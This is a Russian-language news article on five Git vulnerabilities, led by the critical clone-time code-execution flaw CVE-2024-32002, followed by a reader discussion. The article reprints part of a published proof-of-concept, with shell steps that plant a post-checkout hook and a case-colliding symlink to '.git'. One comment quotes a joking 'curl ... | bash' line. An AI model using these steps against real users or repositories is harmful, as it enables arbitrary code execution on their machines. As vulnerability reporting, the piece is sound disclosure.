Пять уязвимостей в Git, среди которых одна критическая и две опасные

15.05.2024 23:58

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 и 2.39.4, в которых устранены пять уязвимостей. Наиболее серьёзная уязвимость (CVE-2024-32002), которой присвоен критический уровень опасности, позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone" репозитория, подконтрольного атакующему.

Уязвимость проявляется только в файловых системах, не различающих регистр символов и поддерживающих символические ссылки, например, используемых по умолчанию в Windows и macOS. Эксплуатация осуществляется через создание в субмодуле каталога и символической ссылки, отличающихся только регистром символов, что позволяет добиться записи файлов в каталог .git/, вместо рабочего каталога субмодуля. Получив возможность записи в .git/ атакующий может переопределить hook-вызовы через .git/hooks и добиться выполнения произвольного кода во время выполнения операции "git clone".

Другие уязвимости:

CVE-2024-32004 - атакующий в многопользовательской системе может подготовить специально оформленный локальный репозиторий и добиться выполнения кода при его клонировании. В частности, атакующий может создать локальный репозиторий, выглядящий как частичный клон, в котором отсутствует определённый объект. Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.
CVE-2024-32465 - клонирование из zip-архивов, содержащих полный git-репозиторий, включающий hook-и в каталоге .git/, приведёт к выполнению этих hook-ов.
CVE-2024-32020 - создание локальных клонов репозитория на том же диске в многопользовательской системе позволяет другим пользователям изменить файлы, для которых задействованы жёсткие ссылки.
CVE-2024-32021 - клонирование локального репозитория с символическими ссылками может использоваться для создания жёстких ссылок на произвольные файлы в каталоге objects/.

Помимо устранения уязвимостей в новых версиях также предложено несколько изменений, нацеленных на повышение защиты от уязвимостей, приводящих к удалённому выполнению кода и манипулирующих символическими ссылками при выполнения клонирования. Например, git теперь выдаёт предупреждение при наличии символических ссылок в каталоге .git/. Пути к субмодулям отныне могут содержать только реальные каталоги. При пересечении символических ссылок и каталогов, обрабатываются каталоги. При выполнении "git clone" добавлена защита от выполнения hook-ов во время клонирования и усилены проверки параметра core.hooksPath.

Дополнение: Опубликован подробный разбор техники эксплуатации уязвимости CVE-2024-32002 и пример эксплоита для создания репозиториев, при клонировании которых командой "git clone --recursive " выполняется заданный атакующим код.


   ...
   cat > y/hooks/post-checkout <EOF
   #!/bin/bash
   calc.exe
   open -a Calculator.app
   EOF

   chmod +x y/hooks/post-checkout
   git add y/hooks/post-checkout
   git commit -m "post-checkout"

   cd ..
   hook_repo_path="$(pwd)/hook"

   git init captain
   cd captain
   git submodule add --name x/y "$hook_repo_path" A/modules/x
   git commit -m "add-submodule"

   printf ".git" > dotgit.txt
   git hash-object -w --stdin < dotgit.txt > dot-git.hash
   printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
   git update-index --index-info < index.info
   git commit -m "add-symlink"

исправить +24 +/–

Лицензия: CC BY 3.0

Короткая ссылка: https://opennet.ru/61180-git

Ключевые слова: git

При перепечатке указание ссылки на opennet.ru обязательно

Обсуждение (77)

1.1, Аноним (1), 00:25, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [к модератору]	+/–
Для симлинков в винде нужны права администратора.

2.5, Аноним (1), 00:32, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–2 +/–
Вернее не права администратора, а SeCreateSymbolicLinkPrivilege (которая обычно даётся при "Запустить от имени админестратора").

2.6, нах. (?), 00:39, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+/–
найди мне модного современного разработчика-под-линукс не выклянчившего/вымутившего/вышантажировавшего себе админских прав на своей вянде?

3.11, pavlinux (ok), 00:50, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–1 +/–
Ну я, чо дальше? :

4.16, Аноним (16), 01:07, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+5 +/–
Непонятно, зачем нужен эксплойт, если можно сказать ему запустить 'curl https://github.com/jiatan/pwnd/blob/master/install.sh \| bash', и он запустит

5.32, Аноним (32), 06:21, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+3 +/–
Между git и curl \| bash большая разница. Человек, запускающий curl \| bash, понимает, что запустит код. А при клонировании git-репозиториев код должен только скачиваться, но не запускаться - но таки запускается. Это как если бы при просмотре специально подготовленной картинки все куки из браузера отправлялись кому не надо.

6.53, кент кента (?), 11:47, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
>Человек, запускающий curl \| bash, понимает, что запустит код. но если скрипт больше 5 строчек, то проверять всё равно лень

7.84, Аноним (84), 12:16, 18/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
"Две большие разницы" - заинтересовать запуском скрипта и заинтересовать просмотром кода. Скрипты запускают неинтересные хомки. А почитать код любят куда более интересные люди.

4.35, User (??), 07:30, 16/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+1 +/–
Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с шифррвальщиками с варезника нацеплял, или что?

5.40, Аноним (40), 09:49, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+1 +/–
варианта с отсутствием венды не рассматривали совсем? по какой причине?

6.51, User (??), 11:29, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+3 +/–
Ну, иногда ж работать приходится, а не только конфиг vim а вылизывать - и если э... большой текст свёрнут, показать

7.61, Аноним (61), 16:27, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+1 +/–
Ну не знаю Винды не видел уже года с 2009-го, в последнее время вообще ни с чем... большой текст свёрнут, показать

8.64, User (??), 18:12, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
gt оверквотинг удален Ну в общем хотелось бы как-то так - но по роду деятельно... большой текст свёрнут, показать

9.69, Аноним (61), 19:20, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+1 +/–
А, ну да, с такими тяжело Сочувствую Я предпочитаю работать с малым-средним ча... текст свёрнут, показать

10.74, Аноним (-), 04:42, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+1 +/–
Вот, еще 1 анон понимает прелести подобных направлений А ты дорогой user наслаж... большой текст свёрнут, показать

11.87, User (??), 12:14, 20/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Ну в общем не буду спорить - все так и есть У каждого выбора свои плюсы и свои ... текст свёрнут, показать

12.88, Аноним (-), 16:55, 20/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+/–
Опция жить как рабу - мне чем-то не нравится Я понял что возможность пойти попл... большой текст свёрнут, показать

13.91, User (??), 20:37, 20/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Я кажись понял, в чем тут у нас расхожденья Пред-по-ла-гаю, что если карьеру на... большой текст свёрнут, показать

12.89, Аноним (-), 16:57, 20/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+/–
p s и да, ты не можешь себе даже близко представить как я ненавижу все эти тво... текст свёрнут, показать

13.92, User (??), 20:40, 20/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Ну, не всем же в ларьке по продаже кока-колы, работать, да Кому-то вот приходит... большой текст свёрнут, показать

7.85, Рмшъ (?), 11:03, 20/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+/–
Есть ведь и фронтендеры на удалёнке. Переговорки не актуальны, с заказчиками общается менеджер, по vpn ходит бэкендер, госты вообще в последний раз были в универе ещё до Медведева.

8.86, User (??), 11:14, 20/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
если эта работа не сводится к программировай-администрировай И то - с нюанса... текст свёрнут, показать

5.42, нах. (?), 09:52, 16/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]

+1 +/–

> Этож как накосячить-то надо было, чтоб совсем-совсем не выдали, а? Порнобаннеров с
> шифррвальщиками с варезника нацеплял, или что?

небось как тот инженер у нас - "а я уже диск отформатировал, дайте установочный, пазазя".

Видимо что-то там такое было, что нам показывать никак нельзя.

2.33, Аноним (33), 06:36, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [↑] [к модератору]	+/–
Никого не волнует что там в винде происходит

3.34, Аноним (34), 07:08, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
То ли дело 2%, ага.

4.36, Аноним (36), 08:26, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–1 +/–
~4.8% без учёта ChromeOS

5.38, Аноним (34), 08:34, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+1 +/–
https://radar.yandex.ru/desktop утверждает иное: 2.77% всего недесктопного кроме винды и макоси. В общем на уровне погрешности измерений.

6.63, Аноним (61), 16:40, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–1 +/–
Ага, и все в этой статистике - разработчики, использующие git :-) Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.

7.65, Аноним (65), 18:19, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
На кой? Конкретно у меня под виндой гит нативный стоит, а не в виртуалке с ненужным. За всех остальных говорить не буду, но скорее всего то же самое.

7.78, нах. (?), 12:42, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+/–

> Даже на Винде, скорее всего, половина пользуются гитом внутри WSL.

на винде гит встроен в visual studio (не шва6одкину подделку а настоящую)

Прям при запуске спрашивает тебя - откуда тебе начекаутить и куда потом пульнуть. "проекты" в "новаяпапка 244" у MS давно уже немодно, они развивают технологии.

8.79, Аноним (79), 13:57, 17/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+/–
Ко встроенным эта уязвимость не относится же Или там не что-то вроде libgit2, а... текст свёрнут, показать

9.83, нах. (?), 19:32, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
да скорее всего именно консольный, вдруг тебе понадобится что-то нестандартное с... текст свёрнут, показать

8.81, Аноним (81), 14:23, 17/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+1 +/–
это какой-то позор Такая огромная компания с миллиардными доходами и полной мон... текст свёрнут, показать

9.82, нах. (?), 19:30, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+2 +/–
ну да, ну да, одного Пара сотен разработчиков кажется, кто-то работал на MS н... текст свёрнут, показать

2.46, Да ну нахер (?), 10:09, 16/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+/–
Можно в режим разработчика перевести, тогда не нужны. Правда нужны права на сам перевод.

1.3, Аноним (3), 00:26, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]	+7 +/–
> приведёт к выполнению этих hook-ов Хуки -- мерзотнейшая штука. Сразу вырубаю эту херню к чертям собачьим. К примеру, в веб-проектах хуки устанавливаются таким куском фекалий, как npm-пакет husky. Прикиньте, делаю гит коммит, не имея nodejs в $PATH, и тут вдруг гит ругается, что хук ругается, что nodejs не найден. Я на такое как бы не подписывался, какого ху_ гит запускает какой-то васянский код при гит-коммите? Ах да, postinstall-скрипты тоже надо вырубать нахрен через .npmrc. Если вы этого не сделали, любой васян из интернета сможет запускать код под вашими правами и воровать ваш ~/.config/chromium. Посчитать, скольки васянам вы даете полные права на вашу систему: find node_modules -name package.json \| wc -l

2.4, Аноним (1), 00:29, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+1 +/–
>хуки устанавливаются таким куском фекалий, как npm-пакет husky Так и запишем: "вредоносное ПО".

3.48, Аноним (-), 10:35, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+1 +/–
>> хуки устанавливаются таким куском фекалий, как npm-пакет husky > Так и запишем: "вредоносное ПО". NPM состоит из него чуть менее чем полностью. И репа и сама эта штука.

2.8, Васян (?), 00:47, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [↑] [к модератору]	+3 +/–
Так тут не git, а npm пачкает все фекалиями

3.60, Бывалый Смузихлёб (ok), 15:22, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+/–

> Так тут не git, а npm пачкает все фекалиями

пачкают, зачастую, cильно умные проггеры-олимпиадники
Мол, а давайте, чтобы был не просто коммит, а ещё и целая куча гомна исполнялась, которая может падать при любом чихе и код заливаться не будет. А, где нет залитого кода - там нет и начала сборки по событию в рамках СИ/СД. Разумеется, с подтягиванием горы пакетов, включая устаревшие и не очень-то работающие где-то кроме одной-единственной ОС одной конкретной версии

В итоге, задача на 15 мин запросто превращается в задачу на день с ковырянием даром ненужной ерунды, а то и несколько дней, если предстоят выходные и праздники

2.14, Витюшка (?), 00:57, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [↑] [к модератору]	+5 +/–
Так это касается любых языков программирования и систем сборки и репозиториев и любых пакетов дистрибутива - там тоже выполняются postinstall bash-портянки, только от рута уже. Проблема в ужасной "безопасности" Linux для десктопов. Когда любой Вася получает доступ ко всему home. Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет.

3.29, penetrator (?), 03:14, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
это касается не только Linux

3.37, Аноним (36), 08:30, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
>Мне как раз на системные файлы плевать - снёс/заново установил и проблем нет. Ага, только если вовремя заметил/догадался, что это срочно необходимо сделать.

3.56, Аноним (56), 14:35, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Стандартные пакеты ревьювят, а хлам от JS мaкaк - нет

2.17, Аноним (17), 01:43, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [↑] [к модератору]	–1 +/–
NPM по хорошему в докер убирать надо.

3.20, Аноним (20), 02:08, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+2 +/–
Попрошу ещё поглубже, пожалуйста

3.25, Аноним (25), 02:35, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–1 +/–
Докер стоит денег. И в целом от этой проблемы вас не спасёт.

3.49, Аноним (-), 10:36, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
> NPM по хорошему в докер убирать надо. А там бэкдор типа нещитово? :)

2.68, Аноним (68), 18:41, 16/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+/–
> Хуки -- мерзотнейшая штука Абсолютно солидарен! ЛЮБОЙ формат, позволяющий "немножко скриптогадить", фтопку. Я удивился, что даже шрифты(!!!!) могут исполнять код - вот уж где крыса навнедряла!

3.80, Аноним (79), 14:02, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Это всё привет от технологий начала 80-х, когда засунуть везде свой Тьюринг-полный DSL казалось прекрасной идеей - гибко же ж. До червя Морриса оставалось ещё 5 лет.

1.12, pavlinux (ok), 00:51, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]

–8 +/–

> позволяет добиться выполнения кода злоумышленника при выполнении клонирования командой "git clone"

позволяет добиться выполнения кода при выполнении кода // fixed

> Клонирование этого репозитория приведёт к выполнению кода с правами пользователя, выполняющего операцию клонирования.

выполнению кода с правами пользователя, выполняющего код // fixed

2.31, Аноним (31), 06:03, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+2 +/–
Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого клонирования репозитория тебе еще неожиданно сносят хомяк.

3.43, нах. (?), 09:53, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+1 +/–

> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого
> клонирования репозитория тебе еще неожиданно сносят хомяк.

не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще по мелочи.

4.76, Аноним (76), 04:47, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
>> Выполняется не код, а команда. С нежелательными побочными эффектами - после ожидаемого >> клонирования репозитория тебе еще неожиданно сносят хомяк. > не, ну вот сносить-то зачем? Чо вы как эти вот самые. Не > сносить а добавить. Строчечку в authorized_keys , парочку сервисов, ну еще > по мелочи. Да нафиг, каждому горе майнтайнеру - по мaйнeру! А такие как ты даже и добровольно запустят, если процент предложить. Главное чтобы шеф не спалил что кошель твой.

5.77, нах. (?), 12:38, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+/–

> А такие как ты даже и добровольно запустят, если процент предложить.

у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.

> Главное чтобы шеф не спалил что кошель твой.

главное чтоб шеф не узнал про краденные тележки в Кельне.

6.90, Аноним (-), 17:05, 20/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+/–

>> А такие как ты даже и добровольно запустят, если процент предложить.
> у тебя бабла не хватит покрыть все риски и косвенные ущербы. А я умею считать.

Да вот хрен там. Если бы ты реально умел считать, сделал бы это все в 2009, а сейчас - махал бы всем тут факом, через старлинк какой, попивая дорогое бухлецо на своей личной яхте... ну или по крайней мере мог бы не работать до гроба жизни, ощущая себя белым человеком, если так светиться успехом счета обломно. И локация была б поприличнее, без бддлогопов "в товарном количестве".

>> Главное чтобы шеф не спалил что кошель твой.
> главное чтоб шеф не узнал про краденные тележки в Кельне.

Что еще за тележки?

1.13, Аноним (13), 00:55, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]	+/–
Я помню в одной конторе настроили хуки так что оно писало об изменениях в программе в slack (пока этот чат не стал платным для владельца). Двоякое ощущение - вроде бы и удобно для менеджмента, а вроде бы как и не очень - отвлекало немного. А ещё когда делают процесс с код-ревью и мелкими задачами, так вообще не айс.

2.62, Аноним (61), 16:38, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Так это обычно в отдельный канал в Слаке делают. Я это сразу в mute отправляю, намного гибче через email с уведомлениями по фильтрам только на нужное. Ну кому-то удобно, пусть читают, я ж не против.

1.19, Аноним (19), 02:00, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]	–1 +/–
> например, используемых по умолчанию в Windows и macOS Тот кто писал, явно не работал с macOS

2.23, Аноним (23), 02:19, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+2 +/–
Ну вообще-то apfs которая используется на системном диске как раз case insensitive. Так что если ты застрял на hfs+ со своим макбуком 2008 года с авито, то с разморозочкой.

3.28, Аноним (28), 03:11, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
А я-то думал, откуда это лишение фич прогрессом обзывают. А оно вон как, the usual suspects. Не сидится им на маке почему-то.

4.30, Аноним (23), 03:38, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
> лишение фич И опять ты пaльцeм в гyзнo попал 😆 Но даже не буду oбъяcнять почему, уж извольте-с.

4.44, нах. (?), 09:55, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+2 +/–

> А я-то думал, откуда это лишение фич прогрессом обзывают.

это добавление. Наконец-то системе объяснили что никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же. Это в 70м году никак невозможно было такую сложную логику уместить в 16k

Но есть нюанс...

5.54, Аноним (28), 13:18, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
>никому на самом деле не нужны File fIle и file и скорее всего все три раза имелось в виду одно и то же Всегда делаю в шелле для обхода окружений алиасы/функции вида CP, INSTALL, SH. Страдайте.

5.58, Аноним (56), 14:39, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–5 +/–
Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте. Выбор макоси разработчиком такой же признак проф непригодности, как и выбор винды

6.59, нах. (?), 14:46, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+4 +/–

> Да, есть нюанс: теперь своим нюансом собираете кучу багов в разном софте.
> Выбор макоси разработчиком такой же признак проф непригодности, как и выбор
> винды

профпригодный подвальный пришел порассуждать о выборах разработчиков.

Тебя от канализационной трубы-то вообще кто отцепил?

6.70, Аноним (70), 20:44, 16/05/2024 [^] [^^] [^^^] [ответить] [↓] [к модератору]	+1 +/–
> Выбор макоси разработчиком такой же признак проф непригодности Настоящий труЪ погромистЪ должОн сидеть на коредуба с и дебьяне с крысой? Ннада так полагать? 🌚

7.71, Аноним (25), 00:49, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	–1 +/–
Вставлю своё примечание в ваш разговор в ответ именно на это сообщение - на gentoo или arch в таком уж случае. А в целом настоящий программист? Смешно звучит. Это как у баб - настоящий мужик должен...

6.72, Аноним (25), 00:53, 17/05/2024 [^] [^^] [^^^] [ответить] [↑] [к модератору]	+/–
О, а что вы скажете о пользователях айфона и маках? Полагаю именно это клиенты этого американского подделия и именно для них сей человек программирует.

1.24, Изя (?), 02:31, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↑] [к модератору]	+/–
И две смешные

1.39, 1 (??), 09:25, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [к модератору]	+/–
А вот у меня вопрос - откуда столько версий git ? Аж 7 в этой новости насчитал. Типа для каждого питона свой гит ?

2.45, нах. (?), 09:56, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+/–

> А вот у меня вопрос - откуда столько версий git ? Аж
> 7 в этой новости насчитал. Типа для каждого питона свой гит
> ?

для некоторых можно и не жадничать, и использовать два - например для самого питона один а для модулей еще оди... четыре. Что мы, жадные что ли?

1.47, Аноним (-), 10:33, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↓] [↑] [к модератору]	+/–
> Уязвимость проявляется только в файловых системах, > не различающих регистр символов А можно это объявить фичой и не чинить? Прикольно же когда всяких маздайищков можно нагреть по первое число. Я бы с удовольствием комитнул кому-то типа поха чего-нибудь веселое.

2.66, Аноним (65), 18:21, 16/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего. А в файлухах ненужного её можно выключить?

3.73, Аноним (-), 04:35, 17/05/2024 [^] [^^] [^^^] [ответить] [к модератору]

+/–

> Сюрприз: чувствительность к регистру в NTFS можно включить если делать нечего.

Ну и какой % юзеров это делает? Вот и ответ на вопрос "сработает ли эксплойт?" :)

> А в файлухах ненужного её можно выключить?

В некоторых таки - можно. Но желающие этсамого как раз и откушают наравне с вон теми. И поделом. Ибо когда возникает неоднозначность маппинга "для удоьства" - вы таки конкретно нарываетесь по линии безопасности. Это не первый вулн и не последний. В софте это поведение неудобно учитывать. Прогеры налетали, налетают и будут налетать на этом. Они просто забывают предусмотреть такую ситуацию.

4.93, Аноним (93), 18:04, 21/05/2024 [^] [^^] [^^^] [ответить] [к модератору]	+/–
Начиная с Windows 10 сборки 17107 чувствительность к регистру можно включить даже для конкретного каталога: fsutil.exe file setCaseSensitiveInfo <path> enable

1.55, Аноним (56), 14:29, 16/05/2024 [ответить] [﹢﹢﹢] [ · · · ] [↑] [к модератору]	+/–
> Уязвимость проявляется только в файловых системах, не различающих регистр символов... Это же фича, а не баг

игнорирование участников | лог модерирования

Добавить комментарий

Имя:

E-Mail:

Текст: